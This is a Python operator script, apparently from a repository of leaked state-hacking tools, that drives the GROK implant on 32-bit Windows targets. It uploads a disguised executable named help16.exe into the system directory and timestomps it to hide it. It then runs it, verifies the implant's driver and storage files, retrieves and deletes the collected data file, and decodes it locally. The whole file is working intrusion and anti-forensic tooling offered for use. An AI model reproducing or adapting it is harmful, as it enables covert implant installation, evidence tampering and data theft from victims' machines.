sneedmca/shadowbrokers-exploits
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
shadowbrokers-exploits/windows/Resources/GROK/PyScripts/grok_x86.py

275 lines
11 KiB
Python
Raw Normal View History

Inital commit of Shadowbrokers 'Lost in Translation' release
2017-04-14 09:45:07 +00:00
import dsz.lp
import dsz.version
import dsz.ui
import dsz.path
import dsz.file
import dsz.control
import dsz.menu
import dsz.env
tool = 'Grok'
version = '1.2.0.1'
fileName = 'help16.exe'
resDir = dsz.lp.GetResourcesDirectory()
logdir = dsz.lp.GetLogsDirectory()
GROK_PATH = ('%s\\%s\\%s' % (resDir, tool, version))
def grokverify(input):
storageSuccessFlag = True
driverSuccessFlag = True
success = True
if dsz.file.Exists('tm154d.da', ('%s\\..\\temp' % systemPath)):
dsz.ui.Echo('tm154d.da dump file exists ... this should not be here', dsz.ERROR)
if dsz.file.Exists('tm154p.da', ('%s\\..\\temp' % systemPath)):
dsz.ui.Echo('tm154p.da overflow file exists ... log may be full', dsz.ERROR)
if dsz.file.Exists('tm154_.da', ('%s\\..\\temp' % systemPath)):
dsz.ui.Echo('tm154_.da config file exists ... ', dsz.GOOD)
if dsz.file.Exists('tm154o.da', ('%s\\..\\temp' % systemPath)):
dsz.ui.Echo('tm154o.da storage file exists ... SUCCESSFUL', dsz.GOOD)
else:
dsz.ui.Echo('tm154o.da storage file missing ... FAILED', dsz.ERROR)
storageSuccessFlag = False
if dsz.file.Exists('msrtdv.sys', ('%s\\drivers' % systemPath)):
dsz.ui.Echo('msrtdv.sys driver exists ... SUCCESSFUL', dsz.GOOD)
else:
dsz.ui.Echo('msrtdv.sys driver missing ... FAILED', dsz.ERROR)
driverSuccessFlag = False
if ((driverSuccessFlag == True) and (storageSuccessFlag == True)):
dsz.ui.Echo('GROK properly installed on target', dsz.GOOD)
elif (((driverSuccessFlag == False) and (storageSuccessFlag == True)) or ((driverSuccessFlag == True) and (storageSuccessFlag == False))):
dsz.ui.Echo('GROK is in a bad state', dsz.WARNING)
success = False
else:
dsz.ui.Echo("GROK doesn't exist on target!", dsz.ERROR)
success = False
return success
def putfile(localfile, remotefile):
dsz.ui.Echo(('Putting %s on target as %s' % (localfile, remotefile)))
cmd = ('put %s -name %s' % (localfile, remotefile))
dsz.control.echo.Off()
global putid
(runsuccess, putid) = dsz.cmd.RunEx(cmd)
dsz.control.echo.On()
if (not runsuccess):
dsz.ui.Echo(('Could not put %s on target as %s' % (localfile, remotefile)), dsz.ERROR)
return False
dsz.ui.Echo(('Successfully put %s on target as %s' % (localfile, remotefile)))
cmd = ('matchfiletimes -src %s\\help.exe -dst %s' % (systemPath, remotefile))
dsz.control.echo.Off()
runsuccess = dsz.cmd.Run(cmd)
dsz.control.echo.On()
if (not runsuccess):
dsz.ui.Echo(('Could not matchfiletimes -src %s\\help.exe to -dst %s' % (systemPath, remotefile)), dsz.ERROR)
dsz.ui.Echo('Make sure to manually delete it!!!', dsz.ERROR)
return False
dsz.ui.Echo(('Matchfiletimes -src %s\\help.exe to -dst %s' % (systemPath, remotefile)))
return True
def runfile(remotefile):
dsz.ui.Echo(('Running %s' % remotefile))
cmd = ('run -command "%s"' % remotefile)
dsz.control.echo.Off()
runsuccess = dsz.cmd.Run(cmd)
dsz.control.echo.On()
if (not runsuccess):
dsz.ui.Echo(('Running %s failed!!!' % remotefile), dsz.ERROR)
dsz.ui.Echo('Make sure to manually clean!!!', dsz.ERROR)
return False
return True
def collectfiles(temppath):
dsz.ui.Echo(('Getting collection file, %s\\Tprf3~' % temppath))
cmd = ('get %s\\Tprf3~' % temppath)
dsz.control.echo.Off()
runsuccess = dsz.cmd.Run(cmd, dsz.RUN_FLAG_RECORD)
dsz.control.echo.On()
if (not runsuccess):
dsz.ui.Echo(('Could not get collection file, %s\\Tprf3~' % temppath), dsz.ERROR)
return False
getfilename = dsz.cmd.data.Get('FileLocalName::localname', dsz.TYPE_STRING)[0]
dsz.ui.Echo(('Deleting collection file, %s\\Tprf3~' % temppath))
cmd = ('delete %s\\Tprf3~' % temppath)
dsz.control.echo.Off()
runsuccess = dsz.cmd.Run(cmd)
dsz.control.echo.On()
if (not runsuccess):
dsz.ui.Echo(('Could not delete collection file, %s\\Tprf3~' % temppath), dsz.ERROR)
return False
dsz.ui.Echo('Moving file to NOSEND directory...')
dsz.control.echo.Off()
dsz.cmd.Run(('local mkdir %s\\GetFiles\\NOSEND' % logdir))
dsz.cmd.Run(('local mkdir %s\\GetFiles\\Grok_Decrypted' % logdir))
cmd = ('local move %s\\GetFiles\\%s %s\\GetFiles\\NOSEND\\%s' % (logdir, getfilename, logdir, getfilename))
runsuccess = dsz.cmd.Run(cmd)
dsz.control.echo.On()
success = parsefile(('%s\\GetFiles\\NOSEND\\%s' % (logdir, getfilename)))
if (not success):
return False
return True
def parsefile(file):
(path, filename) = dsz.path.Split(file)
cmd = ('local run -command "%s\\Offline\\GkDecoder.exe %s %s\\GetFiles\\Grok_Decrypted\\%s.xml"' % (GROK_PATH, file, logdir, filename))
dsz.control.echo.Off()
runsuccess = dsz.cmd.Run(cmd, dsz.RUN_FLAG_RECORD)
dsz.control.echo.On()
if (not runsuccess):
dsz.ui.Echo('There was an error parsing the collection', dsz.ERROR)
return False
return True
def grokparse(input):
fullpath = dsz.ui.GetString('Please enter the full path to the file you want parse: ', '')
if (fullpath == ''):
dsz.ui.Echo('No string entered', dsz.ERROR)
return False
success = parsefile(fullpath)
if (not success):
return False
return True
def sleepwait():
while True:
dsz.ui.Echo('Sleeping 5s to see if exe self deletes')
dsz.Sleep(5000)
if (not dsz.file.Exists(fileName, systemPath)):
dsz.ui.Echo('Executeable self deleted, good to go')
return True
else:
dsz.ui.Echo('Executeable did not self delete', dsz.ERROR)
def cdtotemp():
dsz.control.echo.Off()
cmd = 'pwd'
dsz.cmd.Run(cmd, dsz.RUN_FLAG_RECORD)
curpath = dsz.cmd.data.Get('CurrentDirectory::path', dsz.TYPE_STRING)[0]
temppath = ('%s\\..\\temp' % systemPath)
cmd = ('cd %s' % temppath)
dsz.cmd.Run(cmd)
dsz.control.echo.On()
return (temppath, curpath)
def cdreturn(curpath):
dsz.control.echo.Off()
cmd = ('cd %s' % curpath)
dsz.cmd.Run(cmd)
dsz.control.echo.On()
return True
def grokinstall(input):
success = putfile(('%s\\Uploads\\msgki.ex_' % GROK_PATH), ('%s\\%s' % (systemPath, fileName)))
if (not success):
return False
success = runfile(('%s\\%s' % (systemPath, fileName)))
if (not success):
return False
sleepwait()
return True
def grokcollect(input):
success = putfile(('%s\\Uploads\\msgkd.ex_' % GROK_PATH), ('%s\\%s' % (systemPath, fileName)))
if (not success):
return False
(temppath, curpath) = cdtotemp()
success = runfile(('%s\\%s' % (systemPath, fileName)))
if (not success):
return False
sleepwait()
cdreturn(curpath)
success = collectfiles(temppath)
if (not success):
return False
return True
def grokuninstall(input):
success = putfile(('%s\\Uploads\\msgku.ex_' % GROK_PATH), ('%s\\%s' % (systemPath, fileName)))
if (not success):
return False
(temppath, curpath) = cdtotemp()
success = runfile(('%s\\%s' % (systemPath, fileName)))
if (not success):
return False
sleepwait()
cdreturn(curpath)
success = collectfiles(temppath)
if (not success):
return False
if dsz.file.Exists('tm154*.da', ('%s\\..\\temp' % systemPath)):
dsz.ui.Echo('tm154*.da files exist, deleting')
cmd = ('delete -mask tm154*.da -path %s\\..\\temp' % systemPath)
dsz.control.echo.Off()
runsuccess = dsz.cmd.Run(cmd)
dsz.control.echo.On()
if (not runsuccess):
dsz.ui.Echo('Failed to delete tm154*.da', dsz.ERROR)
return True
def changename(input):
global fileName
fileName = dsz.ui.GetString('New upload name for GROK:', 'help16.exe')
dsz.ui.Echo(('*** Upload name now set to %s ***' % fileName), dsz.WARNING)
def main():
menuOption = 0
if (not dsz.version.checks.IsWindows()):
dsz.ui.Echo('GROK requires a Windows OS', dsz.ERROR)
return 0
if dsz.version.checks.IsOs64Bit():
dsz.ui.Echo(('GROK %s requires x86' % version), dsz.ERROR)
return 0
if dsz.path.windows.GetSystemPath():
global systemPath
systemPath = dsz.path.windows.GetSystemPath()
else:
dsz.ui.Echo('Could not find system path', dsz.ERROR)
return 0
menu_list = list()
menu_list.append({dsz.menu.Name: 'Install', dsz.menu.Function: grokinstall})
menu_list.append({dsz.menu.Name: 'Uninstall', dsz.menu.Function: grokuninstall})
menu_list.append({dsz.menu.Name: 'Verify Install', dsz.menu.Function: grokverify})
menu_list.append({dsz.menu.Name: 'Collect and Parse', dsz.menu.Function: grokcollect})
menu_list.append({dsz.menu.Name: 'Parse Local', dsz.menu.Function: grokparse})
menu_list.append({dsz.menu.Name: 'Change Upload Name', dsz.menu.Function: changename})
while (menuOption != (-1)):
(retvalue, menuOption) = dsz.menu.ExecuteSimpleMenu(('\n\n========================\nGrok %s Menu\n========================\nUpload Name: %s\n' % (version, fileName)), menu_list)
if (menuOption == 0):
if (retvalue == True):
dsz.lp.RecordToolUse(tool, version, 'DEPLOYED', 'Successful')
if (retvalue == False):
dsz.lp.RecordToolUse(tool, version, 'DEPLOYED', 'Unsuccessful')
dsz.control.echo.Off()
cmd = ('stop %s' % putid)
dsz.cmd.Run(cmd)
dsz.control.echo.On()
elif (menuOption == 1):
if (retvalue == True):
dsz.lp.RecordToolUse(tool, version, 'DELETED', 'Successful')
if (retvalue == False):
dsz.lp.RecordToolUse(tool, version, 'DELETED', 'Unsuccessful')
dsz.control.echo.Off()
cmd = ('stop %s' % putid)
dsz.cmd.Run(cmd)
dsz.control.echo.On()
elif (menuOption == 2):
if (retvalue == True):
dsz.lp.RecordToolUse(tool, version, 'EXERCISED', 'Successful')
if (retvalue == False):
dsz.lp.RecordToolUse(tool, version, 'EXERCISED', 'Unsuccessful')
elif (menuOption == 3):
if (retvalue == True):
dsz.lp.RecordToolUse(tool, version, 'EXERCISED', 'Successful')
if (retvalue == False):
dsz.lp.RecordToolUse(tool, version, 'EXERCISED', 'Unsuccessful')
dsz.control.echo.Off()
cmd = ('stop %s' % putid)
dsz.cmd.Run(cmd)
dsz.control.echo.On()
elif (menuOption == 4):
pass
dsz.ui.Echo('***************************')
dsz.ui.Echo('* GROK script completed. *')
dsz.ui.Echo('***************************')
return 0
if (__name__ == '__main__'):
main()
Reference in a new issue Copy permalink